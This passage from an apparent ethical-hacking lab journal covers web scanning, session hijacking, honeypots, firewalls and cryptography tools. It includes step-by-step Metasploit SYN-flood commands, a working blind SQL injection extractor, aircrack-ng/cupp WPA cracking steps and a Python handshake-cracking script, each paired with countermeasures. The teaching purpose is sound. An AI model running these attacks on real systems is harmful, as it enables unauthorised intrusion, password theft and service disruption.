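            reasons.append(f"{len(s['queries'])} distinct query strings in "
                           f"{s['n']} requests (random cache-busting suffixes)")
        if len(s["agents"]) >= min_agents:
            reasons.append(f"{len(s['agents'])} different User-Agent strings")
        if reasons:
            flagged[ip] = reasons
    return flagged


def constructed_log():
    """Constructed sample: 80 HULK-style requests from 10.0.0.5 plus six normal
    page views from 192.168.1.20. A real flood uses random suffixes; sha1 of a
    counter is used here only to keep the sample reproducible."""
    agents = ["Mozilla/5.0 (X11; Linux x86_64)", "Mozilla/5.0 (Windows NT 10.0)",
              "Mozilla/5.0 (Macintosh)", "Opera/9.80", "Mozilla/5.0 (Android)",
              "curl/7.88.1"]
    lines = []
    for i in range(80):
        suffix = hashlib.sha1(str(i).encode()).hexdigest()[:10]
        lines.append(f'10.0.0.5 - - [10/Oct/2023:13:55:{i % 60:02d} +0000] '
                     f'"GET /index.html?{suffix} HTTP/1.1" 200 5120 "-" '
                     f'"{agents[i % len(agents)]}"')
    for i in range(6):
        lines.append(f'192.168.1.20 - - [10/Oct/2023:13:55:{i:02d} +0000] '
                     f'"GET /page{i}.html HTTP/1.1" 200 2048 "-" "{agents[0]}"')
    return lines


if __name__ == "__main__":
    for ip, reasons in flood_sources(constructed_log()).items():
        print(ip, "->", "; ".join(reasons))
```

Per-source counting is enough for single-host tools such as HULK and LOIC; for a distributed attack the same statistics are computed per URL or per site rather than per IP, and the response is rate limiting or a challenge at the edge rather than blocking one address.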


iv. Metasploit

First, select your target's IP address; here [Link] is the victim. If you only have a domain name, a simple DNS lookup (ping or nslookup) will give you its IP address.

So now we know the victim's IP address, [Link].

Launching Metasploit by typing msfconsole in your kali terminal


Then select the SYN-flood auxiliary module auxiliary/dos/tcp/synflood and list its options:

msf6 > use auxiliary/dos/tcp/synflood

msf6 auxiliary(dos/tcp/synflood) > show options

Now you can see all the options that can be set. To set one, type set followed by the option name and its value.

Two options must be set: the target IP address and the target port. Current Metasploit names the address option RHOSTS (older versions used RHOST):

set RHOSTS [Link]

set RPORT 80

To launch the attack, type:

run

(exploit is accepted as an alias). The module injects raw TCP SYN packets with randomized source addresses, so msfconsole must run as root; and because the sources are spoofed the target cannot simply block the attacker's IP, which is why SYN cookies and connection rate limiting on the server are the relevant countermeasures.

To see the packets, open Wireshark on the same interface and apply the display filter tcp.flags.syn == 1 && tcp.flags.ack == 0; the capture shows a continuous stream of SYNs from varying source addresses.

That is how a DoS attack is performed with Metasploit.

c. Using Burp Suite to inspect and modify traffic between the browser and
target application.

Burp Suite is a fully featured web application attack tool: it does almost anything that you could
ever want to do when penetration testing a web application.

One of Burp Suite's main features is its ability to intercept HTTP requests. Normally HTTP requests go from your browser straight to a web server, and the web server's response is sent back to your browser. With Burp Suite, the browser is configured to use Burp's listener (127.0.0.1:8080 by default) as its HTTP and HTTPS proxy, so every request goes to Burp Suite first, which intercepts it. For HTTPS sites Burp's CA certificate must also be installed in the browser, otherwise the browser refuses Burp's generated certificates. With Intercept switched on in the Proxy tab, each request pauses in Burp, where it can be edited before Forward sends it on; responses can be intercepted and modified the same way.


Practical No. 7
a. Perform Web App Scanning using OWASP Zed Proxy.
Zed Attack Proxy (ZAP) is a free, open-source penetration testing tool being maintained under
the umbrella of the Open Web Application Security Project (OWASP). ZAP is designed
specifically for testing web applications and is both flexible and extensible.

To run a Quick Start Automated Scan :

1. Start ZAP and click the Quick Start tab of the Workspace Window.
2. Click the large Automated Scan button.
3. In the URL to attack text box, enter the full URL of the web application you want to
attack.
4. Click the Attack button.


ZAP will proceed to crawl the web application with its spider and passively scan each page it
finds. Then ZAP will use the active scanner to attack all of the discovered pages, functionality,
and parameters.

ZAP provides two spiders for crawling web applications; you can use either or both of them from this screen.

The traditional ZAP spider discovers links by examining the HTML in responses from the web application. This spider is fast, but it is not always effective when exploring an AJAX web application that generates links using JavaScript; the AJAX Spider drives a real browser to exercise such pages. Note that an automated scan sends attack payloads to the target, so run it only against applications you own or are authorized to test.

b. Use droidsheep on mobile for session hijacking


DroidSheep is a simple Android tool for web session hijacking (sidejacking). It listens for HTTP packets on a wireless (802.11) network and extracts the session identifiers (cookies) from them so that they can be reused to impersonate the logged-in user.
DroidSheep captures sessions with the libpcap library and supports:
• open networks
• WEP-encrypted networks
• WPA and WPA2 encrypted networks (PSK only)
The software uses libpcap and arpspoof; ARP spoofing is what lets it see other clients' traffic, and it is also why the tool needs a rooted device. DroidSheep was developed with the support of the information security team of the University of Trier. The attack only works against sessions carried over plain HTTP: a site that serves everything over HTTPS and marks its session cookie Secure gives the tool nothing to capture.
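The countermeasure is on the server side, in the attributes set on the session cookie. The following Python script is an added example (not part of the original journal and not DroidSheep's code) that audits the Set-Cookie headers of an HTTP response and reports session-like cookies missing Secure, HttpOnly or SameSite; a cookie without Secure is exactly what a sidejacking tool captures. The sample response and cookie values are constructed, and the list of name fragments used to recognise session cookies is an assumption.

```python
# Cookie names (substrings, case-insensitive) that typically carry a session.
SESSION_MARKERS = ("sess", "sid", "token", "auth")

# Constructed HTTP response: PHPSESSID is set without any protective attribute,
# AUTHTOKEN with all of them, and 'theme' is not a session cookie at all.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: PHPSESSID=7a3f9c1e2b; Path=/\r\n"
    "Set-Cookie: AUTHTOKEN=9f8e7d6c; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Set-Cookie: theme=dark; Path=/\r\n"
    "\r\n"
    "<html>...</html>"
)


def parse_set_cookie(value: str) -> dict:
    """Split a Set-Cookie header value into name, value and lower-cased attributes."""
    parts = [p.strip() for p in value.split(";")]
    name, _, val = parts[0].partition("=")
    attrs = {}
    for p in parts[1:]:
        k, _, v = p.partition("=")
        attrs[k.strip().lower()] = v.strip()
    return {"name": name.strip(), "value": val, "attrs": attrs}


def looks_like_session(name: str) -> bool:
    n = name.lower()
    return any(m in n for m in SESSION_MARKERS)


def audit_cookies(raw_response: str):
    """Return [(cookie name, [missing protections])] for session-like cookies.
    Without Secure the cookie is sent over plain HTTP, which is what a sidejacking
    tool captures; without HttpOnly script can read it; without SameSite it rides
    along on cross-site requests."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    findings = []
    for line in head.split("\r\n")[1:]:
        header, _, value = line.partition(":")
        if header.strip().lower() != "set-cookie":
            continue
        cookie = parse_set_cookie(value)
        if not looks_like_session(cookie["name"]):
            continue
        missing = [a for a in ("secure", "httponly", "samesite")
                   if a not in cookie["attrs"]]
        findings.append((cookie["name"], missing))
    return findings


if __name__ == "__main__":
    for name, missing in audit_cookies(SAMPLE_RESPONSE):
        print(name, "missing:", ", ".join(missing) or "nothing")
```

The same check belongs in a web scanner's passive rules (ZAP reports it as a cookie-without-Secure/HttpOnly alert), and it pairs with HSTS on the site so that the browser never sends the cookie over HTTP in the first place.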


c. Demonstrate the use of the following firewalls:


i. Zonealarm and analyse using Firewall Analyzer.

To open the ZoneAlarm client interface, do one of these:

• Double-click the ZoneAlarm Security desktop icon.
• Go to Windows Start Menu > Check Point > ZoneAlarm > ZoneAlarm Security.
• Use the ZoneAlarm icon in the Windows system notification area.

The start page of the ZoneAlarm client interface consists of these components:

• The main status bar, which shows YOUR COMPUTER IS SECURE or YOUR COMPUTER IS
AT RISK. If the computer is at risk, click Fix Now to resolve the reported problem.
• Three panels:
1. ANTIVIRUS & FIREWALL: configures the Antivirus and Anti-spyware settings, the
Firewall settings, the Application Control settings and the Threat Emulation (zero-day)
settings.
2. WEB & PRIVACY: enables or disables the Anti-Keylogger.
3. MOBILITY & DATA: configures the Identity Protection settings (USA only).


ii. Comodo Firewall


Comodo Internet Security offers 360° protection against internal and external threats by
combining a powerful antivirus, an enterprise class packet filtering firewall, and a threat
containment system which automatically runs unrecognized files in a secure, virtual
environment.

Click 'Tasks' > 'Firewall Tasks'.

The firewall offers the following main benefits:
• Monitors all network traffic to protect your computer against inbound and outbound
threats.
• Hides your computer's ports from hackers (stealth mode).
• Blocks malicious software from transmitting your confidential data over the internet.

The Firewall Tasks area lets you configure internet access rights per application, stealth your
computer's ports, view active connections, and block all traffic in and out of your computer.
In addition to this tasks screen, you can configure advanced firewall settings at
'Settings' > 'Firewall'.

d. Use HoneyBOT to capture malicious network traffic.

HoneyBot is a set of scripts and libraries for capturing and analyzing packet captures with
[Link]. Currently, this library provides three scripts:

• [Link] - Capture on an interface for some period of time, and upload the
capture for analysis.
• [Link] - Upload and analyze multiple packet captures to [Link].
• [Link] - Listen for unknown connections, and begin capturing when one is made.
Captures are automatically uploaded and analyzed.

Note that the scripts described here belong to a Python package named HoneyBot that uploads
captures to an online analysis service; the Windows HoneyBOT honeypot from Atomic Software
Solutions is a different program with the same name. Be aware that uploading a capture
sends its full contents, including any credentials in it, to a third party.

[Link]
usage: [Link] [-h] [--seconds SECONDS] [--interface INTERFACE]
[--analyze] [--list-interfaces] [--list-pcaps]
[--export-pcaps]

Capture, upload and analyze network traffic; powered by [Link].

optional arguments:
-h, --help show this help message and exit
--seconds SECONDS The number of seconds to capture traffic for.
--interface INTERFACE
The name of the interface (--list-interfaces to show
available)
--analyze If included, capture will be uploaded for analysis to
[Link].
--list-interfaces Lists the available interfaces.
--list-pcaps Lists pcaps submitted to [Link] for analysis.
--export-pcaps Writes pcaps submitted to [Link] for analysis
to a csv file.
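A minimal connection honeypot in the spirit of the third script, as an added example that is not HoneyBOT's or HoneyBot's code: listen on a port no legitimate service uses, and record every connection that arrives (source, time, first bytes) so the events can be analysed later. Binding to 127.0.0.1, the 256-byte peek and the in-memory event list are lab assumptions; on a real host you would bind the LAN address and write the events to a log or pcap file. The "attacker" is simulated by probe().

```python
"""Connection honeypot: record who connects and what they send first.
Added example, not HoneyBOT code. 127.0.0.1 and the in-memory event
list are lab assumptions."""
import socket
import threading
import time


class ConnectionHoneypot:
    def __init__(self, host="127.0.0.1", port=0, peek=256, idle=0.5):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((host, port))          # port 0: let the OS pick a free port
        self.sock.listen(16)
        self.sock.settimeout(0.2)             # lets the accept loop notice stop()
        self.host, self.port = self.sock.getsockname()[:2]
        self.peek, self.idle = peek, idle
        self.events = []
        self._stop = threading.Event()
        self._thread = threading.Thread(target=self._serve, daemon=True)

    def start(self):
        self._thread.start()
        return self

    def stop(self):
        self._stop.set()
        self._thread.join()
        self.sock.close()

    def _serve(self):
        while not self._stop.is_set():
            try:
                conn, peer = self.sock.accept()
            except socket.timeout:
                continue
            with conn:
                conn.settimeout(self.idle)
                try:
                    first = conn.recv(self.peek)   # whatever the client sends first
                except socket.timeout:
                    first = b""                    # silent connect, e.g. a port scan
                self.events.append({"time": time.time(), "src": peer,
                                    "dst_port": self.port, "data": first})

    def wait_for(self, count, timeout=3.0):
        """Block until `count` events were captured or the timeout passes."""
        deadline = time.time() + timeout
        while len(self.events) < count and time.time() < deadline:
            time.sleep(0.05)
        return len(self.events) >= count


def classify(data):
    """Rough guess at what the client was speaking, from its first bytes."""
    if data[:1] == b"\x16":                       # TLS handshake record type
        return "tls"
    if data.split(b" ", 1)[0] in (b"GET", b"POST", b"HEAD", b"PUT", b"OPTIONS"):
        return "http"
    return "unknown" if data else "empty"


def summarise(events):
    """{source IP: [protocol guess, ...]}: the first view an analyst wants."""
    out = {}
    for e in events:
        out.setdefault(e["src"][0], []).append(classify(e["data"]))
    return out


def probe(port, payload=b"", host="127.0.0.1"):
    """Stand-in for an attacker: connect, optionally send something, disconnect."""
    with socket.create_connection((host, port), timeout=2) as s:
        if payload:
            s.sendall(payload)


if __name__ == "__main__":
    hp = ConnectionHoneypot().start()
    probe(hp.port, b"GET / HTTP/1.0\r\n\r\n")
    probe(hp.port)                    # bare connect, as a connect() port scan does
    hp.wait_for(2)
    hp.stop()
    print(summarise(hp.events))
```

Nothing should ever connect to this port legitimately, so every event is interesting by construction; that is the property that makes honeypot data low-noise compared with a capture of a production interface.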

e. Use the following tools to protect attacks on the web servers:


i. ID Server
Download and install the ID Server tool.
1. Enter the URL or IP address of the target server.

2. Click the Query The Server button.

3. Copy the extracted information.

ID Server sends an HTTP request to the target and reports what the server reveals about itself
in the response, chiefly the Server header identifying the web server software and version,
along with the domain name, open ports and other details. A server that reports a detailed
version string hands an attacker the first thing needed to look up matching exploits; the
countermeasure is to minimise the banner (for example ServerTokens Prod on Apache, or
suppressing the Server and X-Powered-By headers on IIS).
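What ID Server does under the button, as an added example that is not ID Server's code: grab() sends a minimal HEAD request over a raw socket and identify() pulls out the headers that fingerprint the software stack. grab() performs real network I/O and is not exercised here; identify() is shown on two constructed responses, one verbose and one with the banner reduced as the countermeasure above describes.

```python
"""HTTP banner grabbing (what ID Server automates). Added example, not
ID Server code. The two sample responses are constructed."""
import socket

FINGERPRINT_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "x-generator", "via")

SAMPLE_VERBOSE = (b"HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\n"
                  b"X-Powered-By: PHP/7.4.3\r\nContent-Type: text/html\r\n\r\n")
SAMPLE_HARDENED = (b"HTTP/1.1 200 OK\r\nServer: Apache\r\n"      # ServerTokens Prod
                   b"Content-Type: text/html\r\n\r\n")


def identify(raw_response):
    """Return (status line, {header: value}) for the headers that reveal the stack."""
    head = raw_response.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status, *lines = head.split("\r\n")
    found = {}
    for line in lines:
        name, _, value = line.partition(":")
        if name.strip().lower() in FINGERPRINT_HEADERS:
            found[name.strip().lower()] = value.strip()
    return status, found


def grab(host, port=80, path="/", timeout=5):
    """Send a HEAD request over a raw socket and identify() the reply (network I/O)."""
    request = f"HEAD {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode()
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request)
        while True:                       # read until the headers are complete or EOF
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
            if b"\r\n\r\n" in b"".join(chunks):
                break
    return identify(b"".join(chunks))


if __name__ == "__main__":
    print(identify(SAMPLE_VERBOSE))      # version strings leaked
    print(identify(SAMPLE_HARDENED))     # product name only
    # print(grab("target.test"))         # live query against a host you may test
```

Point grab() at a host only with permission; the request is harmless but it is still logged on the other side.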

ii. Microsoft Baseline Security Analyzer


The Microsoft Baseline Security Analyzer (MBSA) is a Windows-based patch assessment tool
from Microsoft. MBSA identifies missing security updates and common security
misconfigurations.

MBSA can scan the local system, a remote system or a range of computers.

Select the scanning options as required.

MBSA first downloads the current security update catalogue from Microsoft, then scans, then
reports which security updates are missing. It reports them; it does not install them.

The Security Update Scan Results screenshot shows the results categorised by issue, with the
number of missing updates for each.

The Administrative Vulnerabilities screenshot lists issues such as password expiry, automatic
updates, firewall status, accounts and other weaknesses.

The remaining screenshots show system information, IIS scan results, SQL Server results and
desktop application results.

Microsoft has since retired MBSA (2.3 was the last release and it does not officially support
Windows 10 or later), so for current systems obtain the same information from Windows
Update/WSUS reporting or the Microsoft Security Compliance Toolkit.

iii. Syhunt Hybrid


Open Syhunt Hybrid and go to Dynamic Scanning. The package also supports Code Scanning
(static analysis of the application source) and Log Scanning.

Enter the URL or IP address and start the scan.

The results screen lists the detected vulnerabilities; click a vulnerability to see the issue and its
solution.

The description view explains the vulnerability detected by the tool, and the solution view
gives a recommendation to resolve it. Verify each finding by hand before reporting it: a
dynamic scanner can only see what its payloads trigger, so it produces both false positives
and misses.

Practical No. 8
a. Protect the Web Application using dotDefender.
dotDefender is a web application firewall (WAF) that lets businesses protect external websites
and internal applications in an affordable, effective and simple manner without involving costly
security experts. It is a multi-platform solution that runs as a module on Apache and IIS web
servers. Central management gives a single point of control and reporting for all servers.

You can modify the Default Security Profile or any of the Website Security Profiles. A WAF
blocks known attack patterns in incoming requests; it does not fix the underlying vulnerability,
so treat it as an extra layer in front of patched code rather than a substitute for the fix.


b. Demonstrate the following tools to perform SQL Injection:


i. Tyrant SQL
Tyrant SQL is a cross-platform, Havij-style graphical front end for sqlmap.

ii. Havij
Havij is an automated SQL Injection tool that helps penetration testers find and exploit SQL
Injection vulnerabilities on a web page. It is a closed-source Windows tool that is no longer
maintained; it survives in labs because its one-click interface makes each stage of the attack
visible.

iii. BBQSQL
BBQSQL is a blind SQL injection framework written in Python. It is useful when attacking tricky
SQL injection vulnerabilities. BBQSQL is semi-automatic, allowing quite a bit of customisation
for those hard-to-trigger findings. The tool is built to be database agnostic and is versatile, and
it has a menu-driven UI that makes setting up attacks easier. Blind injection yields only one
true/false (or one timing) answer per request, so extraction is slow by nature; BBQSQL uses
gevent to send many requests concurrently, which is what makes it fast.
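The technique these tools automate, as an added example that is not code from Havij, Tyrant SQL or BBQSQL: a boolean-based blind injection against a deliberately vulnerable product lookup backed by an in-memory SQLite database, next to the parameterised version of the same page, which the identical attack fails against. The schema, the rows and the "product page" are constructed for the lab; the admin password it recovers is a planted value.

```python
"""Boolean-based blind SQL injection against a constructed SQLite-backed page.
Added example, not code from any of the tools named on the page."""
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
    CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
    CREATE TABLE users (username TEXT, password TEXT);
    INSERT INTO products VALUES (1, 'Router'), (2, 'Switch');
    INSERT INTO users VALUES ('admin', 's3cret!');     -- planted secret
""")
queries_sent = {"n": 0}        # how many requests the attack needed


def product_page_vulnerable(product_id):
    """The injection point: the id is pasted into the SQL text. The only thing the
    attacker observes is whether a product was displayed (True) or not (False)."""
    queries_sent["n"] += 1
    sql = f"SELECT name FROM products WHERE id = {product_id}"
    return bool(db.execute(sql).fetchall())


def product_page_safe(product_id):
    """Same page with a bound parameter: the input is data, never SQL."""
    queries_sent["n"] += 1
    try:
        pid = int(product_id)
    except ValueError:
        return False
    return bool(db.execute("SELECT name FROM products WHERE id = ?", (pid,)).fetchall())


ADMIN_PASSWORD = "SELECT password FROM users WHERE username = 'admin'"


def extract_blind(page, subquery, max_len=64):
    """Recover the result of `subquery` through a true/false page: first its length,
    then each character by binary search on its code point (one request per step)."""
    length = next((n for n in range(max_len + 1)
                   if page(f"1 AND length(({subquery})) = {n}")), None)
    if length is None:               # no condition was ever true: nothing injected
        return None
    result = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126             # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if page(f"1 AND unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    print(extract_blind(product_page_vulnerable, ADMIN_PASSWORD), queries_sent["n"])
    print(extract_blind(product_page_safe, ADMIN_PASSWORD))
```

Against the vulnerable page the whole password comes back in roughly seven requests per character plus the length probes; against the parameterised page every probe returns False because "1 AND ..." is not an integer, and the extractor gives up. That difference, not input filtering, is the fix a WAF such as dotDefender can only approximate.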


Practical No. 9

Use Aircrack-ng suite for wireless hacking and countermeasures.


In this case, we have captured some 802.11 (wireless network) packets, including the WPA
4-way handshake, and saved the file. Using this file with "Cupp" and "Aircrack-ng", we will
create a password file and crack the password.
Procedure:
1. Capture some wlan packets using the filter "[Link]==aa:bb:cc:dd:ee" and save the file.
The capture must contain the 4-way handshake between the access point and a client;
aircrack-ng cannot recover the PSK from data frames alone.
2. Go to the Kali Linux terminal.
3. Change the directory to the Desktop.
root@kali:~# cd Desktop
4. Download the "Cupp" utility to create the wordlist.
root@kali:~/Desktop# git clone [Link]

5. Change the directory to Desktop/cupp.

root@kali:~/Desktop# cd cupp
6. List the files in the current directory.
root@kali:~/Desktop/cupp# ls
7. Run the utility [Link].
root@kali:~/Desktop/cupp# ./[Link]


8. Run [Link] with the -i option for interactive user password profiling.

root@kali:~/Desktop/cupp# ./[Link] -i

9. Provide the closest information you have about the target; the better the profile, the higher
the chance of a successful crack.
10. You can add keywords.
11. You can add special characters.
12. You can add random numbers.
13. You can enable leet mode (letters replaced by look-alike digits, e.g. a becomes 4 and e
becomes 3).

14. On successful completion, you will find a new text file named after the first name you typed
in interactive mode. This file contains a large number of candidate passwords. As shown in the
figure below, the file [Link] has been created in the current directory.

15. You can check the file by opening it.


16. Now crack the password using aircrack-ng with the wordlist just created.
root@kali:~# cd
root@kali:~# aircrack-ng -a 2 -b <BSSID of WLAN router> -w
/root/Desktop/cupp/[Link] '/root/Desktop/[Link]'

[Link] is the captured packet file. -a 2 selects the WPA-PSK attack, -b restricts the attack to
the given BSSID and -w names the wordlist. Only candidates of 8 to 63 characters are tried,
because a WPA passphrase cannot have any other length; shorter cupp output is skipped
silently.

17. This will start the process, and all keys will be checked.


18. The result will either show the key or report that it could not be found in the dictionary.

Countermeasure: once a single handshake is captured the attack is entirely offline, so the
only defence for WPA2-PSK is a passphrase that no wordlist will contain (long and random,
not derived from the owner's profile); WPA3-SAE or WPA2-Enterprise (802.1X) removes the
offline dictionary attack altogether.
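What step 16 does for each candidate, as an added example that is not aircrack-ng or cupp code: derive the PMK from the passphrase (PBKDF2-HMAC-SHA1, 4096 rounds, salted with the SSID), expand it to the PTK with the two MAC addresses and two nonces from the handshake, and check whether the KCK reproduces the MIC on the second EAPOL message. A small cupp-style profiler supplies the wordlist. A real .cap cannot be embedded here, so forge_handshake() builds a synthetic handshake from a known passphrase (random MACs and nonces, a dummy EAPOL body); with a real capture you would read the SSID, MACs, nonces, EAPOL frame and MIC from the handshake frames instead. The SSID "LabNet" and the names in the profile are made up.

```python
"""WPA2-PSK handshake verification with a profile-generated wordlist.
Added example, not aircrack-ng/cupp code. forge_handshake() stands in for
a real capture; "LabNet", "john", "sparky" and "1990" are made-up lab data."""
import hashlib
import hmac
import os


def pmk_from_passphrase(passphrase, ssid):
    """IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]              # KCK = bytes 0..15, KEK = 16..31, TK = 32..47


def mic_for(passphrase, hs):
    """MIC a WPA2/AES station would put on message 2 if this passphrase were right."""
    ptk = ptk_from_pmk(pmk_from_passphrase(passphrase, hs["ssid"]),
                       hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
    return hmac.new(ptk[:16], hs["eapol_zeroed_mic"], hashlib.sha1).digest()[:16]


def crack(hs, wordlist):
    """Return the candidate whose MIC matches, or None. Candidates outside 8..63
    characters are skipped: no WPA passphrase has such a length, which is also
    why aircrack-ng skips them."""
    for word in wordlist:
        word = word.strip()
        if 8 <= len(word) <= 63 and hmac.compare_digest(mic_for(word, hs), hs["mic"]):
            return word
    return None


LEET = str.maketrans("aeiost", "431057")


def profile_wordlist(first_name, pet_name, birth_year, leet=True):
    """cupp-style candidates: names, names + year, + 2-digit year, + '123', leet forms."""
    words = []
    for base in (first_name, pet_name, first_name + pet_name):
        for suffix in ("", birth_year, birth_year[-2:], "123"):
            words.append(base + suffix)
            words.append(base.capitalize() + suffix)
            if leet:
                words.append(base.lower().translate(LEET) + suffix)
    return list(dict.fromkeys(words))      # drop duplicates, keep order


def forge_handshake(ssid, passphrase):
    """Synthetic 'capture' (random MACs/nonces, dummy EAPOL body) whose MIC was
    produced with the given passphrase. Only here because a .cap cannot be embedded."""
    hs = {"ssid": ssid, "ap_mac": os.urandom(6), "sta_mac": os.urandom(6),
          "anonce": os.urandom(32), "snonce": os.urandom(32),
          "eapol_zeroed_mic": b"\x01\x03\x00\x75\x02\x01\x0a\x00" + bytes(109)}
    hs["mic"] = mic_for(passphrase, hs)
    return hs


if __name__ == "__main__":
    handshake = forge_handshake("LabNet", "Sparky1990")
    print(crack(handshake, profile_wordlist("john", "sparky", "1990")))   # Sparky1990
```

Each candidate costs 4096 HMAC-SHA1 rounds, which is the only thing slowing the attacker down; it is also why a passphrase built from the owner's name, pet and birth year falls to a few dozen guesses while a random 20-character one does not fall at all.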


Practical No. 10

Use the following tools for cryptography


i. HashCalc
Calculating MD5 value using HashCalc
1. Open HashCalc tool.

2. Create a new file with some content in it as shown below.

3. Select Data Format as “File” and upload your file



4. Select Hashing Algorithm and Click Calculate

5. Now select the Data Format "Text String", type "IPSpecialist…" into the Data field and
calculate the MD5.

The MD5 calculated for the text string "IPSpecialist…" is
"a535590bec93526944bd4b94822a7625".

6. Now let's see how the MD5 value changes with a minor change to the input.


Changing the case of a single letter changes the entire hash value. The MD5 calculated for the
text string "IPspecialist…" is "997bd71ad0158de71f6e97a57261b9a7". This is the avalanche
property every cryptographic hash is expected to have: on average half the output bits flip
for any change to the input. MD5 is used here only to illustrate hashing; its collision
resistance is broken, so use SHA-256 or stronger wherever an attacker could choose the input.
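The same measurements scripted, as an added example that is not HashCalc's code: hash a file in chunks, hash a text string, and count how many bits differ between the digests of two inputs, which puts a number on the avalanche effect the two "IPSpecialist" runs show. The temporary file is constructed by the script and the inputs are chosen here.

```python
"""Hashing as HashCalc does it, plus an avalanche measurement.
Added example, not HashCalc code; inputs and temp file are constructed."""
import hashlib
import os
import tempfile


def digest_text(text, algo="md5", encoding="utf-8"):
    """Hash a string the way a tool hashing its bytes does (the encoding matters)."""
    return hashlib.new(algo, text.encode(encoding)).hexdigest()


def digest_file(path, algo="md5", chunk_size=1 << 16):
    """Hash a file without reading it all into memory."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def differing_bits(hex_a, hex_b):
    """Hamming distance between two hex digests of equal length."""
    if len(hex_a) != len(hex_b):
        raise ValueError("digests must come from the same algorithm")
    return bin(int(hex_a, 16) ^ int(hex_b, 16)).count("1")


def avalanche(text_a, text_b, algo="md5"):
    """(digest a, digest b, bits that differ, bits in the digest)."""
    a, b = digest_text(text_a, algo), digest_text(text_b, algo)
    return a, b, differing_bits(a, b), len(a) * 4


def file_matches_text(text, algo="md5"):
    """Write text to a temp file and confirm the 'File' and 'Text String' modes agree."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "sample.txt")
        with open(path, "wb") as f:
            f.write(text.encode("utf-8"))
        return digest_file(path, algo) == digest_text(text, algo)


if __name__ == "__main__":
    for algo in ("md5", "sha256"):
        a, b, bits, total = avalanche("IPSpecialist...", "IPspecialist...", algo)
        print(f"{algo}: {a}\n{' ' * len(algo)}  {b}\n  {bits} of {total} bits differ")
    print(file_matches_text("IPSpecialist..."))
```

If your "File" and "Text String" results ever disagree for the same text, look at line endings and encoding first: an editor that adds a trailing newline or saves as UTF-16 is hashing different bytes.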

ii. Advanced Encryption Package


1. Download and install the latest version of Advanced Encryption Package. In this lab we use
Advanced Encryption Package 2014 and 2017 to check compatibility on Windows 7 and
Windows 10 respectively.


2. Select the File you want to Encrypt.


3. Set password
4. Select Algorithm

5. Click Encrypt


6. Compare both Files

7. Now, after forwarding the encrypted file to another PC (in our case a Windows 10 PC),
decrypt it using Advanced Encryption Package 2017.
8. Enter the password. The password must reach the recipient over a different channel from
the file; a password-encrypted file is only as strong as that password and its handling.

9. File Successfully decrypted.

iii. TrueCrypt
TrueCrypt is a disk encryption program that lets you create encrypted file containers and secure
disk partitions on your Windows computer. There are times when your hard drive is accessible
by other people, such as in an office, while travelling, or at home, and the data on the PC may
be exposed and compromise your privacy. TrueCrypt protects that data at rest. Note that
TrueCrypt development ended in 2014 and its authors declared it unmaintained; the audited
successor VeraCrypt uses the same wizard described below and is the one to use outside this
lab.

Click Next twice on the following screens to create an encrypted file container with a
standard TrueCrypt volume (those are the default options). Click Select File and browse to
the location where you want to create the new container. Make sure it is not in the Dropbox
folder if Dropbox is running. You can name the container anything you want, e.g. [Link].

Click Next on the encryption options page unless you want to change the encryption algorithm
or hash algorithm. Select the volume size on the next screen; a few hundred megabytes is
plenty for this exercise.

Enter a strong password on the next screen. Use as many characters as possible (24+) with
upper and lower case letters, numbers and special characters. The maximum length of a
TrueCrypt password is 64 characters. The container is only as strong as this password: the
cipher does not help if the password falls to the kind of wordlist attack shown in Practical 9.

Now select the volume format on the next screen. If you only use Windows computers, select
NTFS as the file system; if you also use other systems, FAT is the more portable choice. Move
the mouse randomly inside the window for a while (the movements feed the random number
generator that produces the volume keys), then click Format.

The new TrueCrypt volume has now been created.

iv. CrypTool
Cryptool is a free e-learning tool to illustrate the concepts of cryptography. Try Various
Encryption/Decryption algorithms.
